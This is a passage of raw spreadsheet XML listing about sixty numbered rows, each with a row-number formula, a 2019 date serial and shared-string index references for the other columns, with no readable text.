      <c r="A15754">
        <f t="shared" si="246"/>
        <v>15753</v>
      </c>
      <c r="B15754">
        <v>753</v>
      </c>
      <c r="C15754" t="s">
        <v>25497</v>
      </c>
      <c r="D15754" s="1">
        <v>43676</v>
      </c>
      <c r="E15754" t="s">
        <v>25526</v>
      </c>
      <c r="F15754" t="s">
        <v>9975</v>
      </c>
      <c r="G15754" t="s">
        <v>26500</v>
      </c>
    </row>
    <row r="15755" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15755">
        <f t="shared" si="246"/>
        <v>15754</v>
      </c>
      <c r="B15755">
        <v>754</v>
      </c>
      <c r="C15755" t="s">
        <v>25497</v>
      </c>
      <c r="D15755" s="1">
        <v>43674</v>
      </c>
      <c r="F15755" t="s">
        <v>9978</v>
      </c>
      <c r="G15755" t="s">
        <v>26501</v>
      </c>
    </row>
    <row r="15756" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15756">
        <f t="shared" si="246"/>
        <v>15755</v>
      </c>
      <c r="B15756">
        <v>755</v>
      </c>
      <c r="C15756" t="s">
        <v>25497</v>
      </c>
      <c r="D15756" s="1">
        <v>43671</v>
      </c>
      <c r="E15756" t="s">
        <v>25609</v>
      </c>
      <c r="F15756" t="s">
        <v>9975</v>
      </c>
      <c r="G15756" t="s">
        <v>26502</v>
      </c>
    </row>
    <row r="15757" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15757">
        <f t="shared" si="246"/>
        <v>15756</v>
      </c>
      <c r="B15757">
        <v>756</v>
      </c>
      <c r="C15757" t="s">
        <v>25497</v>
      </c>
      <c r="D15757" s="1">
        <v>43673</v>
      </c>
      <c r="E15757" t="s">
        <v>26503</v>
      </c>
      <c r="F15757" t="s">
        <v>9975</v>
      </c>
      <c r="G15757" t="s">
        <v>26504</v>
      </c>
    </row>
    <row r="15758" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15758">
        <f t="shared" si="246"/>
        <v>15757</v>
      </c>
      <c r="B15758">
        <v>757</v>
      </c>
      <c r="C15758" t="s">
        <v>25497</v>
      </c>
      <c r="D15758" s="1">
        <v>43672</v>
      </c>
      <c r="E15758" t="s">
        <v>26505</v>
      </c>
      <c r="F15758" t="s">
        <v>9975</v>
      </c>
      <c r="G15758" t="s">
        <v>26506</v>
      </c>
    </row>
    <row r="15759" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15759">
        <f t="shared" si="246"/>
        <v>15758</v>
      </c>
      <c r="B15759">
        <v>758</v>
      </c>
      <c r="C15759" t="s">
        <v>25497</v>
      </c>
      <c r="D15759" s="1">
        <v>43672</v>
      </c>
      <c r="F15759" t="s">
        <v>10526</v>
      </c>
      <c r="G15759" t="s">
        <v>26507</v>
      </c>
    </row>
    <row r="15760" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15760">
        <f t="shared" si="246"/>
        <v>15759</v>
      </c>
      <c r="B15760">
        <v>759</v>
      </c>
      <c r="C15760" t="s">
        <v>25497</v>
      </c>
      <c r="D15760" s="1">
        <v>43676</v>
      </c>
      <c r="F15760" t="s">
        <v>9975</v>
      </c>
      <c r="G15760" t="s">
        <v>26508</v>
      </c>
    </row>
    <row r="15761" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15761">
        <f t="shared" si="246"/>
        <v>15760</v>
      </c>
      <c r="B15761">
        <v>760</v>
      </c>
      <c r="C15761" t="s">
        <v>25497</v>
      </c>
      <c r="D15761" s="1">
        <v>43675</v>
      </c>
      <c r="E15761" t="s">
        <v>25592</v>
      </c>
      <c r="F15761" t="s">
        <v>9975</v>
      </c>
      <c r="G15761" t="s">
        <v>26509</v>
      </c>
    </row>
    <row r="15762" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15762">
        <f t="shared" si="246"/>
        <v>15761</v>
      </c>
      <c r="B15762">
        <v>761</v>
      </c>
      <c r="C15762" t="s">
        <v>25497</v>
      </c>
      <c r="D15762" s="1">
        <v>43674</v>
      </c>
      <c r="E15762" t="s">
        <v>26510</v>
      </c>
      <c r="F15762" t="s">
        <v>9975</v>
      </c>
      <c r="G15762" t="s">
        <v>26511</v>
      </c>
    </row>
    <row r="15763" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15763">
        <f t="shared" si="246"/>
        <v>15762</v>
      </c>
      <c r="B15763">
        <v>762</v>
      </c>
      <c r="C15763" t="s">
        <v>25497</v>
      </c>
      <c r="D15763" s="1">
        <v>43672</v>
      </c>
      <c r="F15763" t="s">
        <v>9975</v>
      </c>
      <c r="G15763" t="s">
        <v>26512</v>
      </c>
    </row>
    <row r="15764" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15764">
        <f t="shared" si="246"/>
        <v>15763</v>
      </c>
      <c r="B15764">
        <v>763</v>
      </c>
      <c r="C15764" t="s">
        <v>25497</v>
      </c>
      <c r="D15764" s="1">
        <v>43670</v>
      </c>
      <c r="E15764" t="s">
        <v>26513</v>
      </c>
      <c r="F15764" t="s">
        <v>9975</v>
      </c>
      <c r="G15764" t="s">
        <v>26514</v>
      </c>
    </row>
    <row r="15765" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15765">
        <f t="shared" si="246"/>
        <v>15764</v>
      </c>
      <c r="B15765">
        <v>764</v>
      </c>
      <c r="C15765" t="s">
        <v>25497</v>
      </c>
      <c r="D15765" s="1">
        <v>43670</v>
      </c>
      <c r="E15765" t="s">
        <v>26515</v>
      </c>
      <c r="F15765" t="s">
        <v>9975</v>
      </c>
      <c r="G15765" t="s">
        <v>26516</v>
      </c>
    </row>
    <row r="15766" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15766">
        <f t="shared" si="246"/>
        <v>15765</v>
      </c>
      <c r="B15766">
        <v>765</v>
      </c>
      <c r="C15766" t="s">
        <v>25497</v>
      </c>
      <c r="D15766" s="1">
        <v>43672</v>
      </c>
      <c r="E15766" t="s">
        <v>25509</v>
      </c>
      <c r="F15766" t="s">
        <v>10021</v>
      </c>
      <c r="G15766" t="s">
        <v>26517</v>
      </c>
    </row>
    <row r="15767" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15767">
        <f t="shared" si="246"/>
        <v>15766</v>
      </c>
      <c r="B15767">
        <v>766</v>
      </c>
      <c r="C15767" t="s">
        <v>25497</v>
      </c>
      <c r="D15767" s="1">
        <v>43674</v>
      </c>
      <c r="E15767" t="s">
        <v>26518</v>
      </c>
      <c r="F15767" t="s">
        <v>9975</v>
      </c>
      <c r="G15767" t="s">
        <v>26519</v>
      </c>
    </row>
    <row r="15768" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15768">
        <f t="shared" si="246"/>
        <v>15767</v>
      </c>
      <c r="B15768">
        <v>767</v>
      </c>
      <c r="C15768" t="s">
        <v>25497</v>
      </c>
      <c r="D15768" s="1">
        <v>43671</v>
      </c>
      <c r="E15768" t="s">
        <v>25517</v>
      </c>
      <c r="F15768" t="s">
        <v>9975</v>
      </c>
      <c r="G15768" t="s">
        <v>26520</v>
      </c>
    </row>
    <row r="15769" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15769">
        <f t="shared" si="246"/>
        <v>15768</v>
      </c>
      <c r="B15769">
        <v>768</v>
      </c>
      <c r="C15769" t="s">
        <v>25497</v>
      </c>
      <c r="D15769" s="1">
        <v>43677</v>
      </c>
      <c r="F15769" t="s">
        <v>10021</v>
      </c>
      <c r="G15769" t="s">
        <v>26521</v>
      </c>
    </row>
    <row r="15770" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15770">
        <f t="shared" si="246"/>
        <v>15769</v>
      </c>
      <c r="B15770">
        <v>769</v>
      </c>
      <c r="C15770" t="s">
        <v>25497</v>
      </c>
      <c r="D15770" s="1">
        <v>43672</v>
      </c>
      <c r="F15770" t="s">
        <v>9975</v>
      </c>
      <c r="G15770" t="s">
        <v>26522</v>
      </c>
    </row>
    <row r="15771" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15771">
        <f t="shared" si="246"/>
        <v>15770</v>
      </c>
      <c r="B15771">
        <v>770</v>
      </c>
      <c r="C15771" t="s">
        <v>25497</v>
      </c>
      <c r="D15771" s="1">
        <v>43669</v>
      </c>
      <c r="E15771" t="s">
        <v>26523</v>
      </c>
      <c r="F15771" t="s">
        <v>9975</v>
      </c>
      <c r="G15771" t="s">
        <v>26524</v>
      </c>
    </row>
    <row r="15772" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15772">
        <f t="shared" si="246"/>
        <v>15771</v>
      </c>
      <c r="B15772">
        <v>771</v>
      </c>
      <c r="C15772" t="s">
        <v>25497</v>
      </c>
      <c r="D15772" s="1">
        <v>43676</v>
      </c>
      <c r="F15772" t="s">
        <v>9975</v>
      </c>
      <c r="G15772" t="s">
        <v>26525</v>
      </c>
    </row>
    <row r="15773" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15773">
        <f t="shared" si="246"/>
        <v>15772</v>
      </c>
      <c r="B15773">
        <v>772</v>
      </c>
      <c r="C15773" t="s">
        <v>25497</v>
      </c>
      <c r="D15773" s="1">
        <v>43674</v>
      </c>
      <c r="E15773" t="s">
        <v>25886</v>
      </c>
      <c r="F15773" t="s">
        <v>9975</v>
      </c>
      <c r="G15773" t="s">
        <v>26526</v>
      </c>
    </row>
    <row r="15774" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15774">
        <f t="shared" si="246"/>
        <v>15773</v>
      </c>
      <c r="B15774">
        <v>773</v>
      </c>
      <c r="C15774" t="s">
        <v>25497</v>
      </c>
      <c r="D15774" s="1">
        <v>43674</v>
      </c>
      <c r="F15774" t="s">
        <v>10526</v>
      </c>
      <c r="G15774" t="s">
        <v>26527</v>
      </c>
    </row>
    <row r="15775" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15775">
        <f t="shared" si="246"/>
        <v>15774</v>
      </c>
      <c r="B15775">
        <v>774</v>
      </c>
      <c r="C15775" t="s">
        <v>25497</v>
      </c>
      <c r="D15775" s="1">
        <v>43677</v>
      </c>
      <c r="E15775" t="s">
        <v>25506</v>
      </c>
      <c r="F15775" t="s">
        <v>9975</v>
      </c>
      <c r="G15775" t="s">
        <v>26528</v>
      </c>
    </row>
    <row r="15776" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15776">
        <f t="shared" si="246"/>
        <v>15775</v>
      </c>
      <c r="B15776">
        <v>775</v>
      </c>
      <c r="C15776" t="s">
        <v>25497</v>
      </c>
      <c r="D15776" s="1">
        <v>43675</v>
      </c>
      <c r="E15776" t="s">
        <v>26529</v>
      </c>
      <c r="F15776" t="s">
        <v>9975</v>
      </c>
      <c r="G15776" t="s">
        <v>26530</v>
      </c>
    </row>
    <row r="15777" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15777">
        <f t="shared" si="246"/>
        <v>15776</v>
      </c>
      <c r="B15777">
        <v>776</v>
      </c>
      <c r="C15777" t="s">
        <v>25497</v>
      </c>
      <c r="D15777" s="1">
        <v>43671</v>
      </c>
      <c r="F15777" t="s">
        <v>9978</v>
      </c>
      <c r="G15777" t="s">
        <v>26531</v>
      </c>
    </row>
    <row r="15778" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15778">
        <f t="shared" si="246"/>
        <v>15777</v>
      </c>
      <c r="B15778">
        <v>777</v>
      </c>
      <c r="C15778" t="s">
        <v>25497</v>
      </c>
      <c r="D15778" s="1">
        <v>43677</v>
      </c>
      <c r="E15778" t="s">
        <v>25512</v>
      </c>
      <c r="F15778" t="s">
        <v>9975</v>
      </c>
      <c r="G15778" t="s">
        <v>26532</v>
      </c>
    </row>
    <row r="15779" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15779">
        <f t="shared" si="246"/>
        <v>15778</v>
      </c>
      <c r="B15779">
        <v>778</v>
      </c>
      <c r="C15779" t="s">
        <v>25497</v>
      </c>
      <c r="D15779" s="1">
        <v>43669</v>
      </c>
      <c r="F15779" t="s">
        <v>9975</v>
      </c>
      <c r="G15779" t="s">
        <v>26533</v>
      </c>
    </row>
    <row r="15780" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15780">
        <f t="shared" si="246"/>
        <v>15779</v>
      </c>
      <c r="B15780">
        <v>779</v>
      </c>
      <c r="C15780" t="s">
        <v>25497</v>
      </c>
      <c r="D15780" s="1">
        <v>43669</v>
      </c>
      <c r="E15780" t="s">
        <v>26513</v>
      </c>
      <c r="F15780" t="s">
        <v>9975</v>
      </c>
      <c r="G15780" t="s">
        <v>26534</v>
      </c>
    </row>
    <row r="15781" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15781">
        <f t="shared" si="246"/>
        <v>15780</v>
      </c>
      <c r="B15781">
        <v>780</v>
      </c>
      <c r="C15781" t="s">
        <v>25497</v>
      </c>
      <c r="D15781" s="1">
        <v>43676</v>
      </c>
      <c r="E15781" t="s">
        <v>25517</v>
      </c>
      <c r="F15781" t="s">
        <v>9975</v>
      </c>
      <c r="G15781" t="s">
        <v>26535</v>
      </c>
    </row>
    <row r="15782" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15782">
        <f t="shared" si="246"/>
        <v>15781</v>
      </c>
      <c r="B15782">
        <v>781</v>
      </c>
      <c r="C15782" t="s">
        <v>25497</v>
      </c>
      <c r="D15782" s="1">
        <v>43673</v>
      </c>
      <c r="E15782" t="s">
        <v>26536</v>
      </c>
      <c r="F15782" t="s">
        <v>9975</v>
      </c>
      <c r="G15782" t="s">
        <v>26537</v>
      </c>
    </row>
    <row r="15783" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15783">
        <f t="shared" si="246"/>
        <v>15782</v>
      </c>
      <c r="B15783">
        <v>782</v>
      </c>
      <c r="C15783" t="s">
        <v>25497</v>
      </c>
      <c r="D15783" s="1">
        <v>43677</v>
      </c>
      <c r="F15783" t="s">
        <v>9975</v>
      </c>
      <c r="G15783" t="s">
        <v>26538</v>
      </c>
    </row>
    <row r="15784" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15784">
        <f t="shared" si="246"/>
        <v>15783</v>
      </c>
      <c r="B15784">
        <v>783</v>
      </c>
      <c r="C15784" t="s">
        <v>25497</v>
      </c>
      <c r="D15784" s="1">
        <v>43675</v>
      </c>
      <c r="E15784" t="s">
        <v>26539</v>
      </c>
      <c r="F15784" t="s">
        <v>9975</v>
      </c>
      <c r="G15784" t="s">
        <v>26540</v>
      </c>
    </row>
    <row r="15785" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15785">
        <f t="shared" si="246"/>
        <v>15784</v>
      </c>
      <c r="B15785">
        <v>784</v>
      </c>
      <c r="C15785" t="s">
        <v>25497</v>
      </c>
      <c r="D15785" s="1">
        <v>43668</v>
      </c>
      <c r="E15785" t="s">
        <v>25509</v>
      </c>
      <c r="F15785" t="s">
        <v>10021</v>
      </c>
      <c r="G15785" t="s">
        <v>26541</v>
      </c>
    </row>
    <row r="15786" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15786">
        <f t="shared" si="246"/>
        <v>15785</v>
      </c>
      <c r="B15786">
        <v>785</v>
      </c>
      <c r="C15786" t="s">
        <v>25497</v>
      </c>
      <c r="D15786" s="1">
        <v>43673</v>
      </c>
      <c r="E15786" t="s">
        <v>26542</v>
      </c>
      <c r="F15786" t="s">
        <v>9975</v>
      </c>
      <c r="G15786" t="s">
        <v>26543</v>
      </c>
    </row>
    <row r="15787" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15787">
        <f t="shared" si="246"/>
        <v>15786</v>
      </c>
      <c r="B15787">
        <v>786</v>
      </c>
      <c r="C15787" t="s">
        <v>25497</v>
      </c>
      <c r="D15787" s="1">
        <v>43671</v>
      </c>
      <c r="E15787" t="s">
        <v>25774</v>
      </c>
      <c r="F15787" t="s">
        <v>10021</v>
      </c>
      <c r="G15787" t="s">
        <v>26544</v>
      </c>
    </row>
    <row r="15788" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15788">
        <f t="shared" si="246"/>
        <v>15787</v>
      </c>
      <c r="B15788">
        <v>787</v>
      </c>
      <c r="C15788" t="s">
        <v>25497</v>
      </c>
      <c r="D15788" s="1">
        <v>43671</v>
      </c>
      <c r="E15788" t="s">
        <v>25512</v>
      </c>
      <c r="F15788" t="s">
        <v>9975</v>
      </c>
      <c r="G15788" t="s">
        <v>26545</v>
      </c>
    </row>
    <row r="15789" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15789">
        <f t="shared" si="246"/>
        <v>15788</v>
      </c>
      <c r="B15789">
        <v>788</v>
      </c>
      <c r="C15789" t="s">
        <v>25497</v>
      </c>
      <c r="D15789" s="1">
        <v>43674</v>
      </c>
      <c r="F15789" t="s">
        <v>10526</v>
      </c>
      <c r="G15789" t="s">
        <v>26546</v>
      </c>
    </row>
    <row r="15790" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15790">
        <f t="shared" si="246"/>
        <v>15789</v>
      </c>
      <c r="B15790">
        <v>789</v>
      </c>
      <c r="C15790" t="s">
        <v>25497</v>
      </c>
      <c r="D15790" s="1">
        <v>43668</v>
      </c>
      <c r="F15790" t="s">
        <v>9975</v>
      </c>
      <c r="G15790" t="s">
        <v>26547</v>
      </c>
    </row>
    <row r="15791" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15791">
        <f t="shared" si="246"/>
        <v>15790</v>
      </c>
      <c r="B15791">
        <v>790</v>
      </c>
      <c r="C15791" t="s">
        <v>25497</v>
      </c>
      <c r="D15791" s="1">
        <v>43675</v>
      </c>
      <c r="E15791" t="s">
        <v>25517</v>
      </c>
      <c r="F15791" t="s">
        <v>9975</v>
      </c>
      <c r="G15791" t="s">
        <v>26548</v>
      </c>
    </row>
    <row r="15792" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15792">
        <f t="shared" si="246"/>
        <v>15791</v>
      </c>
      <c r="B15792">
        <v>791</v>
      </c>
      <c r="C15792" t="s">
        <v>25497</v>
      </c>
      <c r="D15792" s="1">
        <v>43669</v>
      </c>
      <c r="E15792" t="s">
        <v>25512</v>
      </c>
      <c r="F15792" t="s">
        <v>9975</v>
      </c>
      <c r="G15792" t="s">
        <v>26549</v>
      </c>
    </row>
    <row r="15793" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15793">
        <f t="shared" si="246"/>
        <v>15792</v>
      </c>
      <c r="B15793">
        <v>792</v>
      </c>
      <c r="C15793" t="s">
        <v>25497</v>
      </c>
      <c r="D15793" s="1">
        <v>43668</v>
      </c>
      <c r="F15793" t="s">
        <v>9975</v>
      </c>
      <c r="G15793" t="s">
        <v>26550</v>
      </c>
    </row>
    <row r="15794" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15794">
        <f t="shared" si="246"/>
        <v>15793</v>
      </c>
      <c r="B15794">
        <v>793</v>
      </c>
      <c r="C15794" t="s">
        <v>25497</v>
      </c>
      <c r="D15794" s="1">
        <v>43672</v>
      </c>
      <c r="E15794" t="s">
        <v>25517</v>
      </c>
      <c r="F15794" t="s">
        <v>9975</v>
      </c>
      <c r="G15794" t="s">
        <v>26551</v>
      </c>
    </row>
    <row r="15795" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15795">
        <f t="shared" si="246"/>
        <v>15794</v>
      </c>
      <c r="B15795">
        <v>794</v>
      </c>
      <c r="C15795" t="s">
        <v>25497</v>
      </c>
      <c r="D15795" s="1">
        <v>43672</v>
      </c>
      <c r="E15795" t="s">
        <v>25592</v>
      </c>
      <c r="F15795" t="s">
        <v>9975</v>
      </c>
      <c r="G15795" t="s">
        <v>26552</v>
      </c>
    </row>
    <row r="15796" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15796">
        <f t="shared" si="246"/>
        <v>15795</v>
      </c>
      <c r="B15796">
        <v>795</v>
      </c>
      <c r="C15796" t="s">
        <v>25497</v>
      </c>
      <c r="D15796" s="1">
        <v>43669</v>
      </c>
      <c r="E15796" t="s">
        <v>26553</v>
      </c>
      <c r="F15796" t="s">
        <v>10526</v>
      </c>
      <c r="G15796" t="s">
        <v>26554</v>
      </c>
    </row>
    <row r="15797" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15797">
        <f t="shared" si="246"/>
        <v>15796</v>
      </c>
      <c r="B15797">
        <v>796</v>
      </c>
      <c r="C15797" t="s">
        <v>25497</v>
      </c>
      <c r="D15797" s="1">
        <v>43670</v>
      </c>
      <c r="E15797" t="s">
        <v>25509</v>
      </c>
      <c r="F15797" t="s">
        <v>10021</v>
      </c>
      <c r="G15797" t="s">
        <v>26555</v>
      </c>
    </row>
    <row r="15798" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15798">
        <f t="shared" si="246"/>
        <v>15797</v>
      </c>
      <c r="B15798">
        <v>797</v>
      </c>
      <c r="C15798" t="s">
        <v>25497</v>
      </c>
      <c r="D15798" s="1">
        <v>43671</v>
      </c>
      <c r="E15798" t="s">
        <v>25592</v>
      </c>
      <c r="F15798" t="s">
        <v>9975</v>
      </c>
      <c r="G15798" t="s">
        <v>26556</v>
      </c>
    </row>
    <row r="15799" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15799">
        <f t="shared" si="246"/>
        <v>15798</v>
      </c>
      <c r="B15799">
        <v>798</v>
      </c>
      <c r="C15799" t="s">
        <v>25497</v>
      </c>
      <c r="D15799" s="1">
        <v>43668</v>
      </c>
      <c r="E15799" t="s">
        <v>22260</v>
      </c>
      <c r="F15799" t="s">
        <v>10526</v>
      </c>
      <c r="G15799" t="s">
        <v>26557</v>
      </c>
    </row>
    <row r="15800" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15800">
        <f t="shared" si="246"/>
        <v>15799</v>
      </c>
      <c r="B15800">
        <v>799</v>
      </c>
      <c r="C15800" t="s">
        <v>25497</v>
      </c>
      <c r="D15800" s="1">
        <v>43677</v>
      </c>
      <c r="E15800" t="s">
        <v>25592</v>
      </c>
      <c r="F15800" t="s">
        <v>9975</v>
      </c>
      <c r="G15800" t="s">
        <v>26558</v>
      </c>
    </row>
    <row r="15801" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15801">
        <f t="shared" si="246"/>
        <v>15800</v>
      </c>
      <c r="B15801">
        <v>800</v>
      </c>
      <c r="C15801" t="s">
        <v>25497</v>
      </c>
      <c r="D15801" s="1">
        <v>43668</v>
      </c>
      <c r="E15801" t="s">
        <v>25502</v>
      </c>
      <c r="F15801" t="s">
        <v>9975</v>
      </c>
      <c r="G15801" t="s">
        <v>26559</v>
      </c>
    </row>
    <row r="15802" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15802">
        <f t="shared" si="246"/>
        <v>15801</v>
      </c>
      <c r="B15802">
        <v>801</v>
      </c>
      <c r="C15802" t="s">
        <v>25497</v>
      </c>
      <c r="D15802" s="1">
        <v>43677</v>
      </c>
      <c r="E15802" t="s">
        <v>26142</v>
      </c>
      <c r="F15802" t="s">
        <v>9975</v>
      </c>
      <c r="G15802" t="s">
        <v>26560</v>
      </c>
    </row>
    <row r="15803" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15803">
        <f t="shared" si="246"/>
        <v>15802</v>
      </c>
      <c r="B15803">
        <v>802</v>
      </c>
      <c r="C15803" t="s">
        <v>25497</v>
      </c>
      <c r="D15803" s="1">
        <v>43671</v>
      </c>
      <c r="E15803" t="s">
        <v>25517</v>
      </c>
      <c r="F15803" t="s">
        <v>9975</v>
      </c>
      <c r="G15803" t="s">
        <v>26561</v>
      </c>
    </row>
    <row r="15804" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15804">
        <f t="shared" si="246"/>
        <v>15803</v>
      </c>
      <c r="B15804">
        <v>803</v>
      </c>
      <c r="C15804" t="s">
        <v>25497</v>
      </c>
      <c r="D15804" s="1">
        <v>43670</v>
      </c>
      <c r="E15804" t="s">
        <v>25512</v>
      </c>
      <c r="F15804" t="s">
        <v>9975</v>
      </c>
      <c r="G15804" t="s">
        <v>26562</v>
      </c>
    </row>
    <row r="15805" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15805">
        <f t="shared" si="246"/>
        <v>15804</v>
      </c>
      <c r="B15805">
        <v>804</v>
      </c>
      <c r="C15805" t="s">
        <v>25497</v>
      </c>
      <c r="D15805" s="1">
        <v>43668</v>
      </c>
      <c r="E15805" t="s">
        <v>25517</v>
      </c>
      <c r="F15805" t="s">
        <v>9975</v>
      </c>
      <c r="G15805" t="s">
        <v>26563</v>
      </c>
    </row>
    <row r="15806" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15806">
        <f t="shared" si="246"/>
        <v>15805</v>
      </c>
      <c r="B15806">
        <v>805</v>
      </c>
      <c r="C15806" t="s">
        <v>25497</v>
      </c>
      <c r="D15806" s="1">
        <v>43677</v>
      </c>
      <c r="E15806" t="s">
        <v>25517</v>
      </c>
      <c r="F15806" t="s">
        <v>9975</v>
      </c>
      <c r="G15806" t="s">
        <v>26564</v>
      </c>
    </row>
    <row r="15807" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15807">
        <f t="shared" si="246"/>
        <v>15806</v>
      </c>
      <c r="B15807">
        <v>806</v>
      </c>
      <c r="C15807" t="s">
        <v>25497</v>
      </c>
      <c r="D15807" s="1">
        <v>43668</v>
      </c>
      <c r="E15807" t="s">
        <v>26565</v>
      </c>
      <c r="F15807" t="s">
        <v>10526</v>
      </c>
      <c r="G15807" t="s">
        <v>26566</v>
      </c>
    </row>
    <row r="15808" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15808">
        <f t="shared" si="246"/>
        <v>15807</v>
      </c>
      <c r="B15808">
        <v>807</v>
      </c>
      <c r="C15808" t="s">
        <v>25497</v>
      </c>
      <c r="D15808" s="1">
        <v>43668</v>
      </c>
      <c r="F15808" t="s">
        <v>9975</v>
      </c>
      <c r="G15808" t="s">
        <v>26567</v>
      </c>
    </row>
    <row r="15809" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15809">
        <f t="shared" si="246"/>
        <v>15808</v>
      </c>
      <c r="B15809">
        <v>808</v>
      </c>
      <c r="C15809" t="s">
        <v>25497</v>
      </c>
      <c r="D15809" s="1">
        <v>43670</v>
      </c>
      <c r="F15809" t="s">
        <v>9975</v>
      </c>
      <c r="G15809" t="s">
        <v>26568</v>
      </c>
    </row>
    <row r="15810" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15810">
        <f t="shared" si="246"/>
        <v>15809</v>
      </c>
      <c r="B15810">
        <v>809</v>
      </c>
      <c r="C15810" t="s">
        <v>25497</v>
      </c>
      <c r="D15810" s="1">
        <v>43668</v>
      </c>
      <c r="E15810" t="s">
        <v>25509</v>
      </c>
      <c r="F15810" t="s">
        <v>10021</v>
      </c>
      <c r="G15810" t="s">
        <v>26569</v>
      </c>
    </row>
    <row r="15811" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15811">
        <f t="shared" ref="A15811:A15874" si="247">+ROW(A15810)</f>
        <v>15810</v>
      </c>
      <c r="B15811">
        <v>810</v>
      </c>
      <c r="C15811" t="s">
        <v>25497</v>
      </c>
      <c r="D15811" s="1">
        <v>43677</v>
      </c>
      <c r="F15811" t="s">
        <v>9975</v>
      </c>
      <c r="G15811" t="s">
        <v>26570</v>
      </c>
    </row>
    <row r="15812" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15812">
        <f t="shared" si="247"/>
        <v>15811</v>
      </c>
      <c r="B15812">
        <v>811</v>
      </c>
      <c r="C15812" t="s">
        <v>25497</v>
      </c>
      <c r="D15812" s="1">
        <v>43668</v>
      </c>
      <c r="E15812" t="s">
        <v>26571</v>
      </c>
      <c r="F15812" t="s">
        <v>10021</v>
      </c>
      <c r="G15812" t="s">
        <v>26572</v>
      </c>
    </row>
    <row r="15813" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15813">
        <f t="shared" si="247"/>
        <v>15812</v>
      </c>
      <c r="B15813">
        <v>812</v>
      </c>
      <c r="C15813" t="s">
        <v>25497</v>
      </c>
      <c r="D15813" s="1">
        <v>43676</v>
      </c>
      <c r="E15813" t="s">
        <v>26573</v>
      </c>
      <c r="F15813" t="s">
        <v>9975</v>
      </c>
      <c r="G15813" t="s">
        <v>26574</v>
      </c>
    </row>
    <row r="15814" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15814">
        <f t="shared" si="247"/>
        <v>15813</v>
      </c>
      <c r="B15814">
        <v>813</v>
      </c>
      <c r="C15814" t="s">
        <v>25497</v>
      </c>
      <c r="D15814" s="1">
        <v>43676</v>
      </c>
      <c r="E15814" t="s">
        <v>26575</v>
      </c>
      <c r="F15814" t="s">
        <v>9975</v>
      </c>
      <c r="G15814" t="s">
        <v>26576</v>
      </c>
    </row>
    <row r="15815" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15815">
        <f t="shared" si="247"/>
        <v>15814</v>
      </c>
      <c r="B15815">
        <v>814</v>
      </c>
      <c r="C15815" t="s">
        <v>25497</v>
      </c>
      <c r="D15815" s="1">
        <v>43669</v>
      </c>
      <c r="E15815" t="s">
        <v>25774</v>
      </c>
      <c r="F15815" t="s">
        <v>9975</v>
      </c>
      <c r="G15815" t="s">
        <v>26577</v>
      </c>
    </row>
    <row r="15816" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15816">
        <f t="shared" si="247"/>
        <v>15815</v>
      </c>
      <c r="B15816">
        <v>815</v>
      </c>
      <c r="C15816" t="s">
        <v>25497</v>
      </c>
      <c r="D15816" s="1">
        <v>43670</v>
      </c>
      <c r="E15816" t="s">
        <v>25512</v>
      </c>
      <c r="F15816" t="s">
        <v>9975</v>
      </c>
      <c r="G15816" t="s">
        <v>26578</v>
      </c>
    </row>
    <row r="15817" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15817">
        <f t="shared" si="247"/>
        <v>15816</v>
